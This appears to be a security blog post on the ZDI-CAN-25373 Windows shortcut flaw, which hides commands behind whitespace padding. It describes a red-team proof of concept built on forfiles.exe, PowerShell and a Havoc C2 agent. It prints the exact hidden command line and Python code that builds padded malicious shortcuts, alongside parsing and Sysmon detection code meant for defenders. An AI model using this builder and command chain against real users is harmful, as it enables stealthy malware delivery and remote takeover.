# From Shortcut to Shell: Weaponising ZDI-CAN-25373 for Initial Access

One of the latest vulnerabilities disclosed by Trend Micro's Zero Day Initiative, ZDI-CAN-25373, is a flaw in how Windows presents the contents of shortcut (.LNK) files. It allows an attacker to embed and execute a malicious command while hiding that command from the inspection methods most users and analysts rely on. Earlier LNK-based attacks could usually be identified by opening the shortcut's Properties dialog and reading the Target field; this technique defeats that check, which makes triage and analysis harder for defenders. It is another case of a legitimate Windows feature being turned into a stealthy initial access vector.

---

## Overview

Windows shortcut (.lnk) files are an integral feature of the operating system, designed to provide convenient access to applications, folders and scripts. They are benign in themselves, but their flexibility has long made them attractive to attackers. Adversaries routinely use .lnk files as an initial access vector, embedding commands that launch malicious scripts through PowerShell, cmd.exe or wscript.exe. Such shortcuts can be dressed up with deceptive icons and filenames, so they survive casual scrutiny even without exploiting any vulnerability.

What sets ZDI-CAN-25373 apart is that the embedded payload is hidden even from a manual inspection of the shortcut's properties. This is achieved by padding the malicious command with whitespace characters: Space (0x20), Horizontal Tab (0x09), Line Feed (0x0A), Vertical Tab (0x0B), Form Feed (0x0C) and Carriage Return (0x0D). The padding pushes the real command out of the region the Properties dialog displays, so the Target field looks empty or harmless to the user, and tools that only render the first part of the field miss it as well.
---

## Technical Breakdown

At the core of ZDI-CAN-25373 is a mismatch between what Windows executes and what it shows. ZDI classifies the issue as UI misrepresentation of critical information (CWE-451) rather than as a parsing bug. Normally, when a .lnk file is created, any command specified in the Target or Arguments field is stored in the file and can be read back with the Properties dialog, GUI tools or forensic parsers. That transparency is what lets defenders spot suspicious shortcuts.

A shortcut crafted for ZDI-CAN-25373 fills the arguments field with a long run of whitespace and control characters ahead of the real command. The Windows Shell still passes the arguments to the target when the shortcut is launched, and the padding is harmless there, but the Properties dialog renders only a limited, single-line view of the field, so the command is pushed out of sight and the Target appears empty. The bytes are still present in the file: a hex editor shows them as long runs of 0x20, 0x09 and so on, which is exactly what an analyst should look for.

![[Pasted image 20250723214836.png]]
*Figure 1 - Malicious LNK file Properties*

---

## How it works

### .LNK File Structure Manipulation

A .lnk file follows the binary Shell Link format (MS-SHLLINK): a fixed ShellLinkHeader followed by optional structures that define its behaviour and appearance. One of the most important fields is COMMAND_LINE_ARGUMENTS, a StringData entry that holds the arguments passed to the target executable, such as cmd.exe, powershell.exe or wscript.exe. Malicious shortcuts almost always use this field to deliver and execute arbitrary commands on the victim's system.

### Payload Obfuscation

To exploit the vulnerability, the attacker crafts the COMMAND_LINE_ARGUMENTS field to carry a malicious payload, typically a command that runs a script or downloads a second stage through powershell.exe, cmd.exe or another interpreter. The attacker then hides the payload by inserting whitespace characters into the field, mainly as a long run in front of the real command.
These characters include 0x20 (Space), 0x09 (Horizontal Tab), 0x0A (Line Feed) and others such as 0x0B (Vertical Tab), 0x0C (Form Feed) and 0x0D (Carriage Return). They are not rendered by the Properties dialog and most file inspection tools, yet they do not change what the Windows Shell executes, so the command runs as intended while a quick static look at the shortcut reveals nothing.

Analysing the malicious .lnk file with Eric Zimmerman's LECmd tool, which parses the file rather than rendering it, shows the full arguments field, including the run of whitespace characters used to keep the real command out of plain view.

![[Pasted image 20250723214858.png]]
*Figure 2 - Inspecting the malicious LNK file with LECmd tool*

---

## Execution Behaviour

Despite the padding, the Windows Shell hands the arguments to the target unchanged at runtime and the whitespace has no effect on the command it surrounds. The payload therefore executes exactly as intended, often without any user-facing warning and without being flagged by antivirus or EDR products. Nothing more than a crafted .lnk file is required, which is what makes this execution path so attractive to attackers.

---

## Working Proof of Concept

At CCL we developed a working proof of concept that uses the LNK technique to demonstrate how an attacker could gain initial access. The shortcut targets the built-in Windows binary forfiles.exe, which proxies execution of the real command; that command only fires once a seemingly benign file search succeeds.

To deliver the payload, we packaged the .lnk file alongside a "hidden" text file in a .zip archive and sent it to the target. For added stealth, the shortcut was given a legitimate-looking icon so that it appears harmless and the user is more likely to open it.
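The following is an added example, not code from the original post or from CCL, that turns the structure and padding described in the How it works section into working Python. It builds a minimal shortcut in the MS-SHLLINK layout with a padded COMMAND_LINE_ARGUMENTS field, parses it back the way a forensic parser such as LECmd does (skipping the LinkTargetIDList and LinkInfo structures that real shortcuts usually carry), and flags the padding. The sample paths, the forfiles command line and the 32-character threshold are constructed for the demonstration and are not taken from the malicious file.

```python
import struct
from dataclasses import dataclass

# ShellLinkHeader constants (MS-SHLLINK 2.1)
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

# StringData entries appear in exactly this order when their flag is set (MS-SHLLINK 2.4)
STRING_DATA_ORDER = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

WHITESPACE = " \t\n\x0b\x0c\r"   # the padding characters named in the write-up
CONTROL_WS = WHITESPACE[1:]     # everything except a plain space


def build_lnk(relative_path, arguments, working_dir=".", icon_location=None, id_list=None):
    """Build a minimal Unicode .lnk: ShellLinkHeader [+ LinkTargetIDList] + StringData + TerminalBlock."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS
    strings = {"relative_path": relative_path, "working_dir": working_dir, "arguments": arguments}
    if icon_location is not None:
        flags |= HAS_ICON_LOCATION
        strings["icon_location"] = icon_location
    if id_list is not None:
        flags |= HAS_LINK_TARGET_ID_LIST
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        LNK_HEADER_SIZE, LNK_CLSID, flags,
        0x80,          # FileAttributes: FILE_ATTRIBUTE_NORMAL
        0, 0, 0,       # Creation / Access / Write time (0 = not set)
        0, 0,          # FileSize, IconIndex
        1,             # ShowCommand: SW_SHOWNORMAL
        0, 0, 0, 0,    # HotKey, Reserved1..3
    )
    id_list_blob = struct.pack("<H", len(id_list)) + id_list if id_list is not None else b""
    body = bytearray()
    for flag, key in STRING_DATA_ORDER:
        if flags & flag:
            text = strings[key]
            body += struct.pack("<H", len(text)) + text.encode("utf-16-le")  # CountCharacters + chars, no terminator
    return header + id_list_blob + bytes(body) + b"\x00\x00\x00\x00"  # TerminalBlock ends ExtraData


def parse_lnk(data):
    """Parse a .lnk far enough to recover its StringData fields (what LECmd reports as Arguments etc.)."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("file shorter than a ShellLinkHeader")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:       # IDListSize excludes its own 2 bytes
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                 # LinkInfoSize includes its own 4 bytes
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, key in STRING_DATA_ORDER:
        if not flags & flag:
            continue
        (count,) = struct.unpack_from("<H", data, pos)
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        fields[key] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return fields


@dataclass
class PaddingVerdict:
    suspicious: bool
    total_chars: int
    leading_ws: int
    control_ws: int
    visible_command: str


def inspect_arguments(arguments, max_leading_ws=32):
    """Flag an arguments field padded the ZDI-CAN-25373 way: a long leading whitespace run that pushes
    the command out of the Properties dialog, or any tab/LF/VT/FF/CR at all, which a shortcut created
    through the normal UI has no reason to contain. The threshold is an assumption, not a Windows limit."""
    leading = len(arguments) - len(arguments.lstrip(WHITESPACE))
    controls = sum(arguments.count(c) for c in CONTROL_WS)
    return PaddingVerdict(leading >= max_leading_ws or controls > 0, len(arguments),
                          leading, controls, arguments.strip(WHITESPACE))


def scan_lnk(data):
    """Parse a shortcut and return the padding verdict for its arguments (None if it has none)."""
    fields = parse_lnk(data)
    return inspect_arguments(fields["arguments"]) if "arguments" in fields else None


# Constructed sample inputs (not the file from the write-up)
PADDED_COMMAND = '/P . /M *.txt /C "powershell -c type 1.txt | powershell -Command -"'
MALICIOUS_ARGS = " " * 300 + "\t\n\r" + PADDED_COMMAND
MALICIOUS_LNK = build_lnk(r"..\..\Windows\System32\forfiles.exe", MALICIOUS_ARGS,
                          icon_location=r"%SystemRoot%\System32\shell32.dll")
BENIGN_LNK = build_lnk(r"..\..\Windows\System32\notepad.exe", r"C:\Users\Public\notes.txt")

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("malicious", MALICIOUS_LNK)):
        v = scan_lnk(blob)
        print(f"{label}: suspicious={v.suspicious} leading_ws={v.leading_ws} control_ws={v.control_ws}")
        print(f"  visible command: {v.visible_command!r}")
```

Two design points: the verdict keeps `visible_command` so the analyst sees what will actually run once the padding is stripped, and the control-character check is independent of the length threshold, because a single tab or line feed in an arguments field is already a strong signal regardless of how much leading space precedes the command. For triage at scale, run `scan_lnk()` over every `.lnk` inside inbound archives rather than trusting the Properties view.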
![[Pasted image 20250723214917.png]]
*Figure 3 - ZIP file with malicious LNK file and hidden text file*

In this scenario the .lnk file launches forfiles.exe, a well-known Living-off-the-Land Binary (LOLBIN), which executes the embedded command when the user opens the shortcut. The command in the COMMAND_LINE_ARGUMENTS field is obfuscated with the whitespace padding described above, so it stays hidden from standard inspection tools while still executing as intended. forfiles searches the current directory for .txt files and, for each match, runs PowerShell, which reads the hidden text file and pipes its contents into a second PowerShell instance that executes them from standard input:

```
C:\Windows\system32\forfiles.exe /P . /M *.txt /C "powershell -c type %USERPROFILE%\Downloads\Havoc\1.txt | powershell -Command -"
```

Note that the path to 1.txt is hard-coded, so this PoC assumes the archive is extracted under %USERPROFILE%\Downloads\Havoc; forfiles' @path variable would make the command location-independent.

The accompanying text file contains a PowerShell script holding encrypted Havoc shellcode that spawns a Demon agent and connects back to our C2 server. Splitting the chain this way helps against EDR: the .lnk file itself initiates no network connection, an activity commonly flagged as an indicator of compromise (IOC). Decoupling the initial access vector from the payload makes the chain harder to spot at first glance.

![[Pasted image 20250723215241.png]]
*Figure 4 – Hidden text file with PowerShell script*

Once a convincing pretext is in place and the .zip file reaches the target, the user is enticed to open the seemingly harmless shortcut. The obfuscated command then silently triggers the payload, which establishes a command-and-control (C2) connection over the internet to our Havoc server and gives the attacker remote access without raising immediate red flags.
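As an added example (not part of the original post or CCL's tooling), the rules below run over constructed Sysmon-style process-creation events modelled on the chain just described: explorer.exe launching forfiles.exe, forfiles.exe spawning powershell.exe, and a second powershell.exe reading its script from standard input with `-Command -`. The event shape, the image paths and the rule names are assumptions for the demonstration; the point is that the process tree is visible to telemetry no matter how the shortcut looks in Properties.

```python
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# powershell.exe told to read its script from stdin: "-Command -" or "-c -" at the end of the command line
STDIN_SCRIPT = re.compile(r"(?:^|\s)-c(?:ommand)?\s+-\s*$", re.IGNORECASE)


def image_name(path):
    """Lower-case file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of every rule one process-creation event matches (assumed Sysmon Event ID 1 fields)."""
    image = image_name(event["Image"])
    parent = image_name(event["ParentImage"])
    cmdline = event["CommandLine"]
    hits = []
    if parent == "explorer.exe" and image == "forfiles.exe":
        hits.append("forfiles_launched_from_explorer")   # what a double-clicked shortcut looks like
    if parent == "forfiles.exe" and image in INTERPRETERS:
        hits.append("forfiles_proxy_execution")          # forfiles /C handing off to an interpreter
    if image in ("powershell.exe", "pwsh.exe"):
        if STDIN_SCRIPT.search(cmdline):
            hits.append("powershell_script_from_stdin")  # script body never appears on any command line
        if "| powershell" in cmdline.lower():
            hits.append("powershell_piping_into_powershell")
    return hits


def triage(events):
    """Evaluate every event and return [(index, hits), ...] for those that matched at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            results.append((i, hits))
    return results


# Constructed events (not telemetry from the engagement); paths are typical defaults
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": r"C:\Windows\Explorer.EXE"},
    {"Image": r"C:\Windows\System32\forfiles.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\system32\forfiles.exe" /P . /M *.txt /C "powershell -c type 1.txt | powershell -Command -"'},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\forfiles.exe",
     "CommandLine": "powershell -c type 1.txt | powershell -Command -"},
    {"Image": PS, "ParentImage": PS,
     "CommandLine": "powershell -Command -"},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",                       # ordinary admin use
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\forfiles.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'forfiles /P C:\Logs /M *.log /D -30 /C "cmd /c del @path"'},  # ordinary log cleanup
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS):
        print(f"event {index}: {image_name(SAMPLE_EVENTS[index]['Image'])} <- "
              f"{image_name(SAMPLE_EVENTS[index]['ParentImage'])}: {', '.join(hits)}")
```

`forfiles_proxy_execution` on its own is noisy, because scheduled maintenance jobs legitimately run `forfiles ... /C "cmd /c del @path"`; the combination that matters here is a forfiles.exe whose parent is explorer.exe (a user opened something) followed by a PowerShell child that takes its script from stdin, which leaves no script path or encoded command on any command line.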
![[Pasted image 20250723215316.png]]
*Figure 5 - Extracted folder and content users will see as .txt file is hidden*

The image below shows a successful connection from the compromised host to our externally hosted Havoc Team Server, confirming that the malicious .lnk file executed as intended and that the encrypted shellcode spawned a Demon agent. The connection gives the operator full command-and-control capabilities, enabling follow-on actions such as privilege escalation, persistence and lateral movement, depending on the objectives of the engagement. The stealthy initial access, combined with the lack of obvious indicators, shows how effective the technique is at slipping past traditional security controls.

![[Pasted image 20250723215959.png]]
*Figure 6 - Successful connection*

---

## Conclusion

ZDI-CAN-25373 demonstrates how even long-standing, trusted Windows features like .lnk files can be subverted to gain stealthy initial access. The ability to hide the executed command from the one place users and many analysts look, the shortcut's Properties dialog, raises the risk posed by malicious shortcuts considerably, especially when they are paired with LOLBINs and encrypted payloads. The bytes do not disappear, though: parsing the file with a tool such as LECmd, or simply flagging shortcuts whose arguments field contains long runs of whitespace or any tab, line feed or carriage return, exposes the padding immediately, and process telemetry showing forfiles.exe spawning powershell.exe remains visible regardless of how the shortcut looks.